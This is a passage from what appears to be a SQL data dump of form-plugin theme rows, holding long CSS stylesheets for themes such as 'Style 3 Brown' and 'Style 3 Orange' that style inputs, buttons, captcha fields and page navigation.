!important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#CFC1C1 !important;\nbackground-color:#ffffff !important;\nfont-style:italic !important;\nborder:1px solid #000 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.input_active:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.input_active\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\ncolor:#000 !important;\nheight:18px !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.captcha_input:focus\n{\ncolor:#000000 !important;\nheight:18px !important;\nbackground-color:#FFDDC4 !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}   \n.page_deactive\n{\nborder:0px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.page_active\n{\nborder:0px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#ffffff !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.page_percentage_active \n{\npadding: 0px !important;\nmargin: 0px !important;\nborder-spacing: 0px !important;\nheight: 10px !important;\nline-height: 10px !important;\nbackground-color: #56AEEE !important;\nborder-radius: 0px !important;\nfont-size: 15px !important;\nfloat: left !important;\ntext-align: right !important;\n}\n.page_percentage_deactive {\nheight: 10px !important;\nline-height: 9px !important;\nborder: 1px solid #000 !important;\nbackground-color:#F4801D !important;\ntext-align: left !important;\npadding: 2px !important;\nborder-radius: 0px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-color:#F4801D !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\n.button_reset\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-color:#F4801D !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\n.wdform_button button \n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-color:#F4801D !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\n.other_input\n{\ncolor:#ffffff !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nmargin-left: 25px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.other_input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\nmargin-left: 25px !important;\n}\nbutton.wdform_page_button\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-color:#F4801D !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#fff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom: 5px !important;\nbackground-color:#56AEEE !important;\nline-height: 35px !important;\n}\n.wdform_percentage_text\n{\nmargin:0px -30px 0px 0px !important;\ncolor:#fff !important;\nfont-weight:bold !important;\nfont-size: 13px !important;\n}\n.wdform_percentage_title\n{\ncolor:#fff !important;\nfont-style:italic !important;\nline-height:9px !important;\nmargin: 0px 0px 0px 40px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #ffffff !important;\nborder-radius:1px !important;\n}', 0),
(18, 'Style 3 Brown', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:inherit !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th, .wdform_table2 td{\n	vertical-align:top !important;\n	text-align:left !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2,  .wdform_table2 table{\nwidth:inherit !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:center;\n	margin:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth: 100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#702400 !important;\nborder:0px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_date_fields select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_date_fields select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_date_fields input\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date_fields input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_select select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_select select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_address input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_address input\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_input input \n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_input input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_address select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_address select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.time_box\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.time_box:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.am_pm_select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#CFC1C1 !important;\nbackground-color:#ffffff !important;\nfont-style:italic !important;\nborder:1px solid #000 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.input_active:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.input_active\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\ncolor:#000 !important;\nheight:18px !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.captcha_input:focus\n{\ncolor:#000000 !important;\nheight:18px !important;\nbackground-color:#FFDDC4 !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}   \n.page_deactive\n{\nborder:0px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.page_active\n{\nborder:0px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/button1_2.png) !important;\nbackground-color:#fff !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.page_percentage_active \n{\npadding: 0px !important;\nmargin: 0px !important;\nborder-spacing: 0px !important;\nheight: 10px !important;\nline-height: 10px !important;\nbackground-color: #702400 !important;\nborder-radius: 0px !important;\nfont-size: 15px !important;\nfloat: left !important;\ntext-align: right !important;\n}\n.page_percentage_deactive {\nheight: 10px !important;\nline-height: 9px !important;\nborder: 1px solid #000 !important;\nbackground-image: url([SITE_ROOT]/images/button1_2.png) !important;\nbackground-color: #fff !important;\ntext-align: left !important;\npadding: 2px !important;\nborder-radius: 0px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-image: url([SITE_ROOT]/images/button1_2.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\n.button_reset\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-image: url([SITE_ROOT]/images/button1_2.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\n.wdform_button button \n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-image: url([SITE_ROOT]/images/button1_2.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\n.other_input\n{\ncolor:#ffffff !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nmargin-left: 25px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.other_input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\nmargin-left: 25px !important;\n}\nbutton.wdform_page_button\n{\ncursor: pointer !important;\nfont-size: 13px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-image: url([SITE_ROOT]/images/button1_2.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#fff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom: 5px !important;\nbackground-color:#702400 !important;\nline-height: 35px !important;\n}\n.wdform_percentage_text\n{\n	font-family:"Times New Roman", Times, serif !important;\nmargin:0px -30px 0px 0px !important;\ncolor:#fff !important;\nfont-weight:bold !important;\nfont-size: 13px !important;\n}\n.wdform_percentage_title\n{\n	font-family:"Times New Roman", Times, serif !important;\ncolor:#fff !important;\nfont-style:italic !important;\nline-height:9px !important;\nmargin: 0px 0px 0px 40px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #ffffff !important;\nborder-radius:1px !important;\n}', 0),
(19, 'Style 3 Orange', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:inherit !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th, .wdform_table2 td{\n	vertical-align:top !important;\n	text-align:left !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2,  .wdform_table2 table{\nwidth:inherit !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:center;\n	margin:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth: 100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#F06E00 !important;\nborder:0px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_date_fields select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_date_fields select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_date_fields input\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date_fields input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_select select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_select select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_address input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_address input\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_input input \n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_input input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_address select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_address select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.time_box\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.time_box:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.am_pm_select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#CFC1C1 !important;\nbackground-color:#ffffff !important;\nfont-style:italic !important;\nborder:1px solid #000 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.input_active:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.input_active\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.required\n{\nborder:none !important;\ncolor:blue\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\ncolor:#000 !important;\nheight:18px !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.captcha_input:focus\n{\ncolor:#000000 !important;\nheight:18px !important;\nbackground-color:#FFDDC4 !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}   \n.page_deactive\n{\nborder:0px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.page_active\n{\nborder:0px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.page_percentage_active \n{\npadding: 0px !important;\nmargin: 0px !important;\nborder-spacing: 0px !important;\nheight: 10px !important;\nline-height: 10px !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder-radius: 0px !important;\nfont-size: 15px !important;\nfloat: left !important;\ntext-align: right !important;\n}\n.page_percentage_deactive {\nheight: 10px !important;\nline-height: 9px !important;\nborder: 1px solid #000 !important;\nbackground-color:#F4801D !important;\ntext-align: left !important;\npadding: 2px !important;\nborder-radius: 0px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\n.button_reset\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\n.wdform_button button \n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\n.other_input\n{\ncolor:#ffffff !important;\nbackground-color:#ffffff !important;\nfont-style:normal 